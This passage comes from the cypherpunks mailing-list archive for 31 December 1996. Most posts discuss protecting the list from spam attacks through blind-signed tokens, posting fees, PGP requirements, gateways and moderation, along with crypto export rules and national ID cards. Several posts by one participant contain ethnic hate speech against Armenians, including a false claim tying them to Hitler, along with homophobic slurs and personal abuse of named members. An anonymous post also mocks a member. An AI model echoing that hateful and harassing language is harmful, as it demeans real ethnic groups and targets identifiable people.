number of tokens to each public key registered with it.  If two signed requests
come from the same email address in the same day signed with different keys,
only the tokens in the first request should be signed.

The only problem with this scheme is the inconvenience of having to register
a public key with the server before posting.  Someone with many different email
addresses could generate a public key for each address to get more tokens.  The
only way to prevent this is to control list subscriptions.


Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsk8uCzIPc7jvyFpAQHFvAgAoogQTxQH74MbtDUSQgfkbwDRIJ1rXaXQ
zqf4D+JyRcpFXUv0cKuUoLGFTkTKdhtGrIBfqhZJvC/n/fWOV0DHIO4asNZWqtEa
NFIsWPyJqrOceCPfTLv4wft9X8aMybu6nOy/B6/NHr+Lw2p5TsfFbms4pHvrE5zt
daZ7zpPkI8l1qDI1I0XUaF6vBOGl3nJtg4NewCagpB8mZulT6wmetoe5NHmrTYEA
OI+UhgCWZSUJTJ2kC+liBmCwZ7+Z1JW39rOpLP6Y4Eo/o8mGErePKFK3ZbTVvfV8
5KyZn7HTxwmoTkEkRt0lOLpqU3afXJVdca9McCBoSklwveMoNwOmEQ==
=pvLP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 31 Dec 1996 11:31:08 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v02140b01aeef08c759b8@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.961231111537.9271B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 31 Dec 1996, Peter Hendrickson wrote:

> At 7:04 AM 12/31/1996, Sandy Sandfort wrote:
> > There is a simple solution to keeping anonymous posters anonymous
> > under this or any similar scheme.  Volunteers could act as
> > "gateways" for anonymous posts.  Self-selected list members could
> > announce that they would forward anonymous posts using one of
> > their own tokens for the purpose.  (In the alternative, the
> > gateway volunteers could be given extra tokens solely for that
> > purpose.)
> 
> Would this expose the posters to liability?  Unlike an anonymous
> remailer, they are deciding what to post.

Probably yes.  This is where the gateway volunteer's discretion
would come into play. 


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 31 Dec 1996 11:46:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <3.0.32.19961231114736.006bd3a0@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 AM 12/31/96 -0800, Peter Hendrickson wrote:
>The easiest and fastest solution is to set up toad.com to charge a
>dollar per message.  (Proceeds to be spent by John Gilmore as he
>sees fit.)
>
>We can then leverage off the existing e-cash infrastructure which
>already provides blinding software for free on all major platforms.

I am not sure that this proposal would work. Some of the spammers on this
list are rather dedicated. They might gladly pay a dollar per message.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 10:32:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: If He Doesn't Like Me
In-Reply-To: <32C92F84.1E32@sk.sympatico.ca>
Message-ID: <219sZD42w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Toto <toto@sk.sympatico.ca> writes:

> Timothy C. May wrote:
> >
> > Your message is the equivalent of that brain-damaged ebonite's "Why can't
> > we all just get along?"
>
> Tim,
>   Have you 'coined a phrase' here?
>   Perhaps future generations, reading of the exploits of the 'Ebonites',
> will recognize your contribution to the language.

Have you seen _Mars Attacks_ where Jack Nicholson, playing the president,
says just that?

have you noticed that a lot of recent popular movies either portray the
U.S.G. as a bunch of crooks and criminals, or make fun of killing them
all (e.g. Mars Attacks). This would have been unthinkable 20 years ago.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 10:31:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <32C92E6B.F02@sk.sympatico.ca>
Message-ID: <D59sZD43w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Toto <toto@sk.sympatico.ca> writes:

> Igor Chudov @ home wrote:
>
> > If tokens are used improperly (to post off-topic materials) the
> > offending subscriber is denied any further tokens.
>
>   I'm sure that the NSA would be more than happy to take responsibility
> for deciding which posts are off-topic.

Cocksucker John Gilmore is an NSA shill who decides what's "off-topic"
and unsubscrives whomever Arachelian@ASALA doesn't like.  What an asshole.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 10:34:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Responsibility
In-Reply-To: <199612310350.TAA29631@netcom7.netcom.com>
Message-ID: <XB0sZD45w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> Dr. Vulis, KOTM, writes:
>
> > Is Brent as goofy as the ASALA terrorist (about to be fired by Earthweb
> > for net-abuse), or even goofier?
>
> Kibo-izing the news spool again Dr. Vulis?

I'm not as good as my friend Serdar Argic, but I'm getting better.

                      FUCK THE ARMENIANS.

P.S. I've been talking to a rich friend of mine who contributes a lot of
money to the Museum of Natural History, a major client of Earthweb, about
Ray Arachelian's libel and net-abuse.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ArkanoiD <ark@paranoid.convey.ru>
Date: Tue, 31 Dec 1996 01:25:03 -0800 (PST)
To: secure@usa.net
Subject: Re: Happy New Year
In-Reply-To: <199612310315.UAA09244@earth.usa.net>
Message-ID: <199612310923.MAA14016@paranoid.convey.ru>
MIME-Version: 1.0
Content-Type: text/plain


nuqneH,

> 
> Dear Friend,
> 
> If you are interested in increasing your income by using your personal
> contacts, Please Consider this... Make up to $400.00 per deal by
> giving away security systems
> 
[some d-ds.]
Hmm. I do not like MLM. Seems to be smth like selling air for me.

-- 
                                       _     _  _  _  _      _  _
   {::} {::} {::}  CU in Hell          _| o |_ | | _|| |   / _||_|   |_ |_ |_
   (##) (##) (##)        /Arkan#iD    |_  o  _||_| _||_| /   _|  | o |_||_||_|
   [||] [||] [||]            Do i believe in Bible? Hell,man,i've seen one!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Tue, 31 Dec 1996 12:34:27 -0800 (PST)
To: markm@voicenet.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <199612312032.MAA04214@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Mark M." <markm@voicenet.com>
> On Tue, 31 Dec 1996, Igor Chudov @ home wrote:
>
> > Send a number of unique tokens to each subscriber each day.
> [...]
> > If tokens are used improperly (to post off-topic materials) the 
> > offending subscriber is denied any further tokens.
> > 
> > The problem of this scheme is (besides its cost) that anonymous users
> > will not be truly anonymous.
>
> I think this problem can be solved by blind signing the tokens.  A user
> generates a random number, multiplies it by the blinding factor, then sending
> it to a token server which would append a timestamp and sign the blinded
> token.  All signature requests should be signed with a PGP key.  The server
> response would be encrypted with the user's public key.  A person's PGP key
> would be sent along with the subscription request and then saved by the list
> software.

This is an interesting idea, however it will be possible for someone with
a respectable public persona to continue getting tokens indefinately for
posting abusive anonymous messages.  There is no way to link the anonymous
tokens with the ones which were issued to good subscribers.

An alternative is to give each subscriber only a small, fixed number of
blinded tokens which he will use for the lifetime of his subscription
to the list.  When someone posts anonymously, they use up one of their
tokens.  Then, if the message was not abusive, a new blinded token is
created, encrypted with the public key of the good-guy anonymous poster,
and broadcast to subscribers.  This way good anonymous posters will get
to keep posting, while abusive ones will shortly run out of anonymous
posting tokens.

The big problem with schemes like this is the difficulty of defining
"good" posts in an acceptable way.  Some list members are hard-line
freedom-of-speechers and don't want to see any limitations on list
postings.  Others would probably classify 80% of the messages on the list
at times as grounds for termination of posting privileges.  Everyone will
have their own thresholds.

There is also the administrative problem of who will judge the posts.
This could take a large commitment of time.  I'm sure many of us
have gotten behind in our list reading from time to time and it can be
intimidating to return from a trip to find hundreds of messages waiting.
Imagine how it would be if you were supposed to be reading them and
looking for bad messages.

We might also want to consider the paradoxical possibility that if we
remove the junk, the list will die!  At least now we are constantly
reminded that the cypherpunks list exists.  Other lists like the
cryptography and coderpunks can sometimes go for quite a while without
any posts at all.  On CP you have the sense of a dynamic community where
you can hope for a response to your posts, more so than on a list which
is silent for days at a time.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 31 Dec 1996 09:38:23 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <Pine.SUN.3.91.961231065434.8933C-100000@crl13.crl.com>
Message-ID: <Pine.SUN.3.91.961231123821.9530D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Dec 1996, Sandy Sandfort wrote:

> There is a simple solution to keeping anonymous posters anonymous
> under this or any similar scheme.  Volunteers could act as
> "gateways" for anonymous posts.  Self-selected list members could
> announce that they would forward anonymous posts using one of
> their own tokens for the purpose.  (In the alternative, the
> gateway volunteers could be given extra tokens solely for that
> purpose.)
> 
> The gateway volunteers would be a firewall against flames and
> spam attacks, but would be a conduit for substantive anonymous
> posts.  If gateway volunteers allowed inappropriate flames and 
> spams through, they would have *their* tokens reduced.

Only problem is that the Vulis^H^H^H^H^Hspammer could still mail flood 
the gateway dudes.  The gateway dudes should be ready for such attacks 
and should be able to handle them.

Such a flood could result in a denyal of post since if you flood someone 
with ten thousand random spams, then the posts worth delivering will get 
lost among those.  So the gateway dudes should be competent enough to 
deal with this sort of thing.

I wouldn't mind running such a gateway if it will fly and I have the time 
since I already provide this sort of filtering anyway.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Tue, 31 Dec 1996 11:49:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: [IMPORTANT] ElGamal
Message-ID: <199612311949.MAA06907@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Mayonnaise's abysmal grammar, atrocious spelling and feeble responses 
clearly identify him as a product of the American education system.

 \0/   \0/\    \ /    /  \0/  \0/   \0/\    \ /    /\0/   \0/ Tim Mayonnaise
  |    /  /)    |    (\   |    |    /  /)    |    (\  \    |
 / \__/\__/0\__/0\__/0\__/ \__/ \__/\__/0\__/0\__/0\__/\__/ \





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 31 Dec 1996 10:44:19 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Internal Passports
In-Reply-To: <v03007801aeecab7271cd@[207.167.93.63]>
Message-ID: <199612311859.MAA01032@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. May wrote:
> My SS card, issued in 1969 (and which I still have, surprisingly enough),
> says this. Someone said recently here on the list that this line was
> dropped in more recent years.

     I had to have mine replaced recently, and that line is no longer 
_anywhere_ on the card. 

     Did they change the laws regarding the use of your SSN as ID, or 
are most people just ignoring it?


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 31 Dec 1996 10:45:55 -0800 (PST)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Internal Passports
In-Reply-To: <v0300781eaeecb0a22cdd@[139.167.130.248]>
Message-ID: <199612311900.NAA01050@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Hettinga wrote:
> At 6:20 pm -0500 12/29/96, Timothy C. May wrote:
> >What I think this means is a move toward a national ID card, replacing the
> >confusing (to airlines, to government agents, etc.) mishmash of state
> >driver's licenses, student ID cards, etc.
> 
> "I've found that they issue a national ID card, it's time to leave..."
>            Lazarus Long, "Time Enough For Love", by Robert A. Heinlein
> 

     Yeah, but where are we going to go?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 31 Dec 1996 13:02:16 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <32C94D58.3CBB@gte.net>
Message-ID: <Pine.3.89.9612311230.A1152-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Dec 1996, Dale Thorn wrote:

> Bill Frantz wrote:
> > The Christmas attack against this list shows the need to develop lists
> > which are resistant to attacks.  If cyberspace is to become the town square
> > of the next century, we need to be able to discourage brown shirts attacks
> > on political gatherings.  If lists are to be a major part of the political
> > life of the community, then they must be resistant to attacks from
> > knowledgeable, well financed attackers, not just the shits who were the
> > most recent perps.
> 
> [snip]
> 
> > All messages sent to the list must be encrypted with the list's public key.
> 
> So in order to post here, I hafta install and run PGP?  Well, people
> were looking for the perfect formula to deny service to guys like me,
> and guess what?  You found it!  I will *not* install and run PGP.
> 
I agree with Dale here...requiring PGP in order to post would probably 
deter low-level, idiot spammers, but it would also keep those people off 
the list who, for one reason or another, don't like/want/use PGP.  Also, 
what about people who post to and read the list from someplace other than 
their home computer, like school or work?  I have access to this account 
from my college, but I'm sure not going to leave my keys lying around 
my account just so I can post to a mailing list.




Zach Babayco 

zachb@netcom.com <-------finger for PGP public key

If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header, *NOT THE BODY OF THE MESSAGE!*  I have 
several useful FAQs and documents available.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 10:31:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <32C92C74.7CC@sk.sympatico.ca>
Message-ID: <uZBTZD46w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Toto <toto@sk.sympatico.ca> writes:

>   I don't know if fuck@yourself.up had any problems as a result of his
> escapade, but if he did, I would suspect there is a good chance that
> they were caused by one of the more soft-spoken people on the forum.

I doubt it. "Cypher punks" are 100% impotent.

Did you hear the one about the woman who complained that her husband
was 300% impotent?  He used to be 100% impotent, then he broke his
finger and bit his tongue.

>   I've bounced a lot of wild-frontier bars in my time, and it has
> been my experience that it is a truism that,
>   "The quiet ones are the guys you don't want to mess with."

Homos played an important role in Hitler's rise to power. Here too,
the head cocksucker John Gilmore is pretty quiet - he just pulls the
plugs while his brown shirts (Ray Arachelian &co) do all the yelling
and screaming and lying. No wonder Armenians were Hitler's most
eager supporters.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 13:04:55 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <v02140b05aeef248fe111@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 AM 12/31/1996, Lucky Green wrote:
>At 10:25 AM 12/31/96 -0800, Peter Hendrickson wrote:
>> The easiest and fastest solution is to set up toad.com to charge a
>> dollar per message.  (Proceeds to be spent by John Gilmore as he
>> sees fit.)

>> We can then leverage off the existing e-cash infrastructure which
>> already provides blinding software for free on all major platforms.

> I am not sure that this proposal would work. Some of the spammers on this
> list are rather dedicated. They might gladly pay a dollar per message.

Let's try it and see how it goes.  If it doesn't work, we can try
a more complicated scheme.  (I volunteer to modify Majordomo to
make this happen.  We could have this feature in the near future.)

I think we should understand that two features are being discussed.

One is protecting the list from spam attacks.  By this I mean attacks
where somebody sends very large numbers of messages to the list
and brings the mail server to its knees.  Charging a dollar a message
solves this problem - just buy more hardware with the proceeds.  If The
Enemy wishes to finance the cypherpunks list - more power to him.

The other feature is filtering.  I do not need anybody to filter
my mail.  I am quite capable of doing it myself, thank you.

If somebody wants to set up a tokened filter scheme, that
is great, but let's see it implemented as an added header to
the cypherpunks messages.  Then people can filter on it if they
want, but it should be their choice.

Anybody who cannot set up such a filter, or find somebody who can
set up such a filter for them, or cannot find somebody who will
forward only filtered messages to them, is too helpless to be a
cypherpunk.

I have seen a lot of complaints about "too much noise".  That is
not a problem.  The problem is too little signal.  I can extract
the signal - unless it isn't there.

I propose that we spend the money on food for the monthly meeting.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 31 Dec 1996 13:05:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regs outlaw financing non-US development
In-Reply-To: <3.0.32.19961228225731.006b3080@netcom13.netcom.com>
Message-ID: <5abv68$e12@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <3.0.32.19961228225731.006b3080@netcom13.netcom.com>,
Lucky Green  <shamrock@netcom.com> wrote:
>First the good news: the export controls mentioned in the draft of the regs
>on any kind of data security software, regardless if it uses crypto or not
>did not carry into the final version.

But it _specifically_ restricts virus-checkers (and, also, it would seem,
backup programs, but that could be stretching it):

ECCN 5D002.c.3:
# ``Software'' designed or modified to protect against malicious
# computer damage, e.g., viruses

   - Ian "_not_ a U.S. Person"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMsl//0ZRiTErSPb1AQH3UgP/a9usiLoJbIpn1XNzSvqDftGPxeuoHO00
WRlaYxm4xIsADedp8xheTQB+cl0gjb10HLwBJ5FUGdbzZkGTEbsW9RQe7OX2t4vB
/6t75K+N6le7A/uJN0oNkmNz+5v5JaaDcsmjOHADzHsGEUFkN3JhRa7YUz83PVOk
zAAyHoSECNs=
=aLLo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 31 Dec 1996 10:11:03 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612310833.CAA03527@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961231130948.9530E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Dec 1996 ichudov@algebra.com wrote:

> The problem of this scheme is (besides its cost) that anonymous users
> will not be truly anonymous.

Not only that, but what's the stop the anon users from claiming to be 
OTHER anon users and requesting tokens.

Say have one true user (Vulis) create 10 zillion tentacles and request 10 
zillion tokens, one from each tentacle and then use them all to post spam?

Human review of posts is likely the only way.  Sure, some things can be 
filtered out, you can look for messages that are less than 1K in size and 
have the words "Timmy" "Mayonaise" "Maya" and various other derogatory 
terms nearby and reject them pronto, but that will only have Vulis change 
the spelling of those words slightly each day and have them show up on the 
list anyway.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 31 Dec 1996 10:32:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Booms, busts and cranks
Message-ID: <9611318520.AA852067912@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


by Terence Corcoran
"ONCE again the holidays and other sources of good cheer, including
a growing economy and rising stock markets, have been wrecked by
the annual Maclean's/CBC News poll. In this annual national survey,
the majority of Canadians express generally sensible views on most
issues--less government isn't so bad, a bigger role for the private
sector is good, debt reduction hasn't gone far enough, private health
care is acceptable, as are multiracial immigration ...
  
...
  
"An accompanying Maclean's story on the looming expansion of the
private sector is mostly an anti-business report that chastises
companies for layoffs and mean-spirited bottom-line thinking. The
problem, it claims, is the failure to hold companies responsible for
anything other than maximizing shareholder value, a popular theme
among statists who have run out of state. 
 
http://web.theglobeandmail.com/web/cgi-bin/
DisplayPage?SITE=web&KEY=961231.ROBColumn.RCORC






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 11:22:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <199612310700.XAA06518@infowest.com>
Message-ID: <igeTZD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Attila T. Hun" <attila@primenet.com> writes:
> ::Yes, but the impotent "cypher punks" can't write or distribute code.
> ::They can only flame and rant and pull plugs.
>
>         Ah, dimitri, my quasi-friend, my quasi-enemy, that is the

Here you mindlessly repeat Ray Arachelian's lies. Have you no mind of your own?
Why am I your "enemy"? Why do you think you're important enough for me to give
a fuck?

>     question, is it not?  Can cypherpunks write code?  Some like to
>     argue, and still can and do write code.  Others only pontificate;
>     and others lurk for the false rush of the ephemeral or fantastical
>     power.

"Cypher punks" write stupid racist flames and postmaster complaints, not code.

>         dimitri, you've never been a lurker in your life; then why do
>     you participate in cypherpunks if they are, to a [wo]man, nothing
>     but wankers? (I guess that works for the gentle sex, too. no? <g>).
>
>         Ah, dimitri, you're secret is out. you are here to harangue!

I am not "here" - I've been unsubscribed by the head censor, cocksucker
John Gilmore at the request of Ray Arachelian and Timmy May. They're
"here" to harrass and to flame and they don't want followups from the
victims of their harrassment.

> ::>     if you do not have the balls to do it, you are not for freedom.
>
> ::If you are a "cypher punk", you are not for freedom.
>
>         No, no, no, dimitri.  Cypherpunks are absolute in their demands
>     for freedom.  Most are making the choice to demand freedom while

Freedom for whom, or from whom? I have no great despect for Abraham
"I freed who?" Lincoln, but I like the quote from him: "Those who deny
freedom to others deserve it not for themselves."

>     they play in the band and the Titanic sinks.  Shall their last song
>     be "God Bless America" or "Nearer my Lord to Thee" --it's all the

Some folks on this mailing list remind me of hardcore communists that
believe that orthodix marxism works, and everyone who tried and failed
to implement it, was perverting marx's ideas. U.S.constitution was an
instrument of class warfare.

>     same is it not?  They, and the rest of the complacent Americans,
>     will go down with the ship (as will the fighters without support).
>
>         Talk is cheap, dimitri.  Let's see a little action.

Yes, let's see some more "dissidents" unsubscribed! Let's see some more
mailbombs and postmaster complaints! Let's see punitive action in response
to speech! That's all "cypher punks" are good for.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Barnes <cman@c2.net>
Date: Tue, 31 Dec 1996 14:07:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <2.2.32.19961231220441.00cb4358@gabber.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



The problem with payment schemes like this is that they're hard
to rationalize (as Lucky points out here).

A direct mail piece (via snail mail) can easily cost the sender
more than a dollar when all costs are taken into account. This
does not seem to have appreciably slowed down junk mailers IRL.

Spam to a large mailing list has a multiplicative effect (although
it's also easier to throw out and/or ignore.) Certainly if someone
had a real product, it would be worth anywhere from $1 to $25 to
post an advertisement to a sizeable mailing list.

On the other hand, a blanket charge would serve as a disincentive
to people who make valuable contributions, unless it were a 
completely negligible cost, in which case the advertisers would
have no problem coughing up the money. There's a serious imbalance
between how annoying spam is and how much we're willing to pay 
to post (most of us would like to see them charged to the point
where they wouldn't do it at all.) 

Possibly a system of charging for non-list-members? Sort of a 
closed list with a way for outside posters to contribute if
they really wanted to?

In general it seems very difficult to balance the various aspects
of maintaining a lively discussion, fostering a sense of community,
allowing anonymous postings, and keeping the whole thing simple
enough to actually implement. 

The best approach I can think of for dealing with a lot of this
crap is to a) ignore outright spam, b) do not feed the energy 
creatures (the people on the list who thrive on conflict.) and
c) instead of responding to noise, contribute to signal.

I've been on the verge of responding to certain posters over the last
few months, and I've realized before I've hit the "send" key that
I'd be giving them just what they want -- attention -- while further
degrading the signal to noise ratio.


At 11:47 AM 12/31/96 -0800, you wrote:
>At 10:25 AM 12/31/96 -0800, Peter Hendrickson wrote:
>>The easiest and fastest solution is to set up toad.com to charge a
>>dollar per message.  (Proceeds to be spent by John Gilmore as he
>>sees fit.)
>>
>>We can then leverage off the existing e-cash infrastructure which
>>already provides blinding software for free on all major platforms.
>
>I am not sure that this proposal would work. Some of the spammers on this
>list are rather dedicated. They might gladly pay a dollar per message.
>
>
>
>-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
>   Make your mark in the history of mathematics. Use the spare cycles of
>   your PC/PPC/UNIX box to help find a new prime.
>   http://www.mersenne.org/prime.htm
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 13:59:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <3.0.32.19961231114736.006bd3a0@netcom13.netcom.com>
Message-ID: <v03007800aeef39814783@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 AM -0800 12/31/96, Lucky Green wrote:
>At 10:25 AM 12/31/96 -0800, Peter Hendrickson wrote:
>>The easiest and fastest solution is to set up toad.com to charge a
>>dollar per message.  (Proceeds to be spent by John Gilmore as he
>>sees fit.)
>>
>>We can then leverage off the existing e-cash infrastructure which
>>already provides blinding software for free on all major platforms.
>
>I am not sure that this proposal would work. Some of the spammers on this
>list are rather dedicated. They might gladly pay a dollar per message.

I'm a skeptic in general, and am particularly skeptical of schemes to
charge money, to meter usage, to distribute "posting tokens," and so forth.

Dedicated posters--and I will not make an artificial distinction between
cross-posters, insulters, essay writers, and "me-too"ers--will of course
pay the $1 to post a message. (For example, the "save big money now!"
spammers would probably willingly pay $1 to "reach" 1000 subscribers.)

On the other hand, students and misers will probably just drop off the list
completely. Is this a good outcome?

I'm not against _market_ solutions, but such artificially-imposed solutions
as mandating a fee, or token, usually result in distorted markets.
(Needless to say, if John Gilmore _chooses_ to impose a posting fee, this
is his right. Caveat poster.)

And why, exactly, is a _posting_ fee a good idea? When I write an essay,
either a short comment like this one or one of my much longer essays on
some topic, I am contributing my _time_....in fact, I should be _charging_
money, not _paying_ money! (I'm joking, of course, as the infrastructure
and habit is lacking...people simply will not set up digital cash systems
to pay, say, 10 cents for an article...this has been proven time and time
again. Whether it changes over time is unknown, but for now it's a moribund
idea.)

And there do exist market-based solutions, at least to the S/N problem: the
various filtered lists, notably that of Eric Blossom, Ray Arachelian, and
maybe others. And anybody is free to establish their own such list. Those
who want their list delivered in encrypted form (for whatever strange
reason) can contract for such a server....I think this even existed for a
brief time. Ditto for anyone who wants _only_ the dandruff-covered missives
from Vulis. And so forth.

The temptation to try to think out solutions to spam problems is strong...I
watched (and participated in) discussions of this consume the Extropians
list for several months...ratings systems for posters, a fee to join the
list, tribunals for politeness offenders, and other "private justice"
systems. Not a bad idea to discuss such things, but I concluded that most
of the efforts were either futile or counterproductive. I know others
disagree, and they can speak up. (I haven't been on the Extropians list
since early '94, and I don't see much traffic copying that list, or
referring to that list...is it still operational?)

Stopping "unwanted mail" from going to the main list--which is of course a
completely different kettle of fish from offering filtered lists--has
really only two main solutions:

1. Moderation by a human reader.

2. Posting only allowed by subscribed readers, with manual approval of
subscription requests.

Both have problems. Nobody I know of has time or interest in approving
posts, and this would significantly delay discussions, and probably kill
them (which may or may not be a good thing, depending on your point of
